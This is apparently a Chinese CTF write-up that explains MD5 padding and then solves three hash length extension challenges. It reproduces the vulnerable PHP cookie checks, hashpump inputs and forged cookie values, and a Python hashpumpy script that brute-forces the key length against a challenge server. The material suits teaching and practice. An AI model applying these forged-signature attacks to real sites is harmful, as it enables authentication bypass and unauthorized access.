md5算法

1:
将消息分组。长度为512位(512/8=64字节)
2:
加密字符串的长度%512=448，不够则对分组进行字符填充
当需要进行消息摘要的明文%512!=448，那么就需要补位,补一个80,然后无限补0.直到字符串%512=448
PS:补位是必须进行的操作。长度刚好位448.也得补位。补64字节
3:
存储原消息长度

总结下格式：明文+80+00补全=56字节+8字节的消息长度
第一个方框中。是我们的明文test(16进制)，占了4字节
中间的是补位：在后面加上一个80.然后0000一直补位到56字节
最后一个方框。是我们的消息长度。test长度为4字节。4*8=32位,16进制为0x20,小端显示
0x00000020=0x20000000
0x12345678=0x78563412

4.
计算消息摘要，当准备工作做好后。就开始加密运算。
这步就不说了。密码学tnl
hash长度扩展攻击

<?php
$SECRET="xxxxx";        //len($SECERT)=6;
$auth = "test";
if (isset($_COOKIE["auth"])) {$hsh = $_COOKIE["hsh"];if ($hsh !== md5($SECRET . $_COOKIE["auth"])) {die("F4ck_U!");}
} else {setcookie("auth", $auth);setcookie("hsh", md5($SECRET . $auth));die("F4ck_U!");
}
die("this is flag{fdajkfjdkjakfjk`}");
?>

这题的要求是md5(SECERT.SECERT._COOKIES['auth'])==$_COOKIES['hsh']
也就是说。我们传入hsh要和(auth和secert拼接然后MD5加密)的值一样
auth和hsh都是我们可控的。但是secert不知道。只知道长度为6

进入web

找到test对应的hash:5a2e54ee57e5b7273b9a8fed78c1ebd8
这时候，使用kali下的一个工具hashpump。

Input Signature: 5a2e54ee57e5b7273b9a8fed78c1ebd8
#已知的hash
Input Data: test
#已知的用户名
Input Key Length: 6
#密钥长度
Input Data to Add: 123
#要在密文后添加的字符串，这题随便添加。没要求
e2e5d57bd08006da01fcf36b1fa69ea2
#生成的md5字符串。
test\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x00\x00\x00\x00\x00\x00\x00123
#生成的hash字符

hsh=e2e5d57bd08006da01fcf36b1fa69ea2
auth=test%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00P%00%00%00%00%00%00%00123
提交得到flag

WhaleCTF: 哈希入侵
web主页。。条件都很清楚了。
密钥长度=4
role(用户名)=admin
hash=c7813629f22b6a7d28a08041db3e80a9
扩展字符串=joychou

要注意的是。生成的字符串。要将\x替换为%

jarvisoj:flag在管理员手里
hsh和role。然后要成为管理员。估计就是admin

扫描了下。有index.php~

        <?php $auth = false;$role = "guest";$salt = if (isset($_COOKIE["role"])) {$role = unserialize($_COOKIE["role"]);$hsh = $_COOKIE["hsh"];if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {$auth = true;} else {$auth = false;}} else {$s = serialize($role);setcookie('role',$s);$hsh = md5($salt.strrev($s));setcookie('hsh',$hsh);}if ($auth) {echo "<h3>Welcome Admin. Your flag is } else {echo "<h3>Only Admin can see the flag!!</h3>";}?>

爆破脚本：

import hashpumpy
import requests
import urllib
for i in range(0,13):m=hashpumpy.hashpump('3a4727d57463f122833d9e732f94e4e0',';\"tseug\":5:s',';\"nimda\":5:s',i)hsh=m[0]role=urllib.quote(urllib.unquote(m[1])[::-1])cookie='role='+role+'; hsh='+hshheaders={'cookie': cookie,}print(headers)url='http://web.jarvisoj.com:32778/'r=requests.get(url=url,headers=headers)print(r.text)

首先我们不知道密钥长度。只能爆破。
由于源程序是MD5=($salt+反转字符串)
那么我们也要传入反转的字符串。来解密。模拟程序输入
然后用python的hashpumpy模块来爆破。
第一个参数是MD5。第二个参数是反转的用户名。
第三个参数是要添加的数据。第四个参数是密钥长度。
然后。需要将\x00URL编码成%00,然后再反转。这次是为了模拟程序输出
总结一句话。源程序加密的时候反转字符串。我们解密的时候也要反转字符串(放入hashpump的参数)
程序输出的时候反转字符串。我们输入的时候也要反转字符串(得到的参数反转)